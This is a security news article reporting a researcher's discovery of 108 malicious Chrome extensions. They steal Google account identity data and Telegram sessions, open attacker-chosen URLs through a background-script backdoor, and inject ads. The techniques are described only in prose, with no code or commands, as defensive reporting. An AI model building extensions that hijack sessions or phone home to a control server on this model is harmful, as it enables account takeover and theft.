100 Chrome Extensions Steal User Data, Create Backdoor

Over 20,000 users installed malicious Chrome extensions designed to provide a backdoor, steal information, or inject ads, cybersecurity firm Socket reports. The nefarious extensions have been published using five different accounts, namely GameGen, InterAlt, SideGames, Rodeo Games, and Yana Project, but appear to be part of a single, coordinated campaign, based on shared command-and-control (C&C) infrastructure. Socket identified 108 extensions performing various types of malicious activities. Half of them were designed to steal Google accounts via OAuth2, and 45 were injected with a universal backdoor that opens arbitrary URLs when the browser starts. The remaining extensions were designed to exfiltrate Telegram sessions, inject ads into YouTube and TikTok pages, inject content scripts into all visited pages, or to proxy translation requests through an attacker-controlled server. “The 108 extensions are published across several product categories: Telegram sidebar clients, slot machine and Keno games, YouTube and TikTok enhancers, a text translation tool, and page utility extensions. Each targets a different type of user, but all share the same backend,” Socket says. The extensions provide the expected functionality to avoid raising suspicion, but malicious code running in the background connects to the threat actor’s C&C to perform the nefarious activities. Socket draws attention to the Telegram Multi-account extension, which steals the active Telegram Web session and allows the attackers to take over the user account by overwriting the local storage with attacker-supplied data and force-reloading Telegram. Another extension, Web Client for Telegram – Teleside, can steal sessions and has a backdoor in the background script that allows the operators to activate a payload directly, without updating the application through the Chrome Web Store. The 54 extensions that can steal users’ Google accounts at login contain identical code to acquire a Google OAuth2 Bearer token, use it to fetch user information, and send the data to a remote server. “The OAuth token is used locally and never leaves the browser. What reaches the operator’s server is only a permanent identity record: the victim’s email, name, and profile picture,” Socket explains. The background script of 45 extensions contains an identical function that, upon browser start, opens a URL received from the C&C in a new tab. “There is no restriction on what URL the server can return. This channel survives browser restarts and operates independently of whether the user ever opens the extension,” Socket notes. The cybersecurity firm says it reported all the malicious extensions, but they were not immediately removed from the Chrome Web Store. Related: Over 300 Malicious Chrome Extensions Caught Leaking or Stealing User Data Related: Chrome, Edge Extensions Caught Stealing ChatGPT Sessions Related: Malicious Chrome Extension Crashes Browser in ClickFix Variant ‘CrashFix’ Related: Chrome Extensions With 900,000 Downloads Caught Stealing AI Chats WRITTEN BY Ionut Arghire Ionut Arghire is an international correspondent for SecurityWeek. More from Ionut Arghire Fortinet Patches Critical FortiSandbox Vulnerabilities SAP Patches Critical ABAP Vulnerability Triad Nexus Evades Sanctions to Fuel Cybercrime Google Adds Rust DNS Parser to Pixel Phones for Better Security Organizations Warned of Exploited Windows, Adobe Acrobat Vulnerabilities Fake Claude Website Distributes PlugX RAT Gmail Brings End-to-End Encryption to Android and iOS for Enterprise Users Juniper Networks Patches Dozens of Junos OS Vulnerabilities Latest News Exploited Vulnerability Exposes Nginx Servers to Hacking Capsule Security Emerges From Stealth With $7 Million in Funding ‘By Design’ Flaw in MCP Could Enable Widespread AI Supply Chain Attacks CISO Conversations: Ross McKerchar, CISO at Sophos Mirax RAT Targeting Android Users in Europe Two Vulnerabilities Patched in Ivanti Neurons for ITSM  $10 Domain Could Have Handed Hackers 25k Endpoints, Including in OT and Gov Networks Trump Urges Extending Foreign Surveillance Program as Some Lawmakers Push for US Privacy Protections Trending Webinar: A Step-By-Step Approach To AI Governance April 28, 2026 With "Shadow AI" usage becoming prevalent in organizations, learn how to balance the need for rapid experimentation with the rigorous controls required for enterprise-grade deployment. Register Virtual Event: Threat Detection And Incident Response Summit May 20, 2026 Delve into big-picture strategies to reduce attack surfaces, improve patch management, conduct post-incident forensics, and tools and tricks needed in a modern organization. Register People on the Move The United States Department of War appointed David Vaughn as Technical Advisor for Data Infrastructure. Black Duck has named Dom Glavach as Chief Information Security Officer. Finite State has named Ann Miller as Vice President of Marketing. More People On The Move Expert Insights The Hidden ROI Of Visibility: Better Decisions, Better Behavior, Better Security Beyond monitoring and compliance, visibility acts as a powerful deterrent, shaping user behavior, improving collaboration, and enabling more accurate, data-driven security decisions. (Joshua Goldfarb) The New Rules Of Engagement: Matching Agentic Attack Speed The cybersecurity response to AI-enabled nation-state threats cannot be incremental. It must be architectural. (Nadir Izrael) The Next Cybersecurity Crisis Isn’t Breaches—It’s Data You Can’t Trust Data integrity shouldn’t be seen only through the prism of a technical concern but also as a leadership issue. (Steve Durbin) Why Agentic AI Systems Need Better Governance – Lessons From OpenClaw Agentic AI platforms are shifting from passive recommendation tools to autonomous action-takers with real system access, (Etay Maor) The Human IOC: Why Security Professionals Struggle With Social Vetting Applying SOC-level rigor to the rumors, politics, and 'human intel' can make or break a security team. (Joshua Goldfarb) Flipboard Reddit Whatsapp Email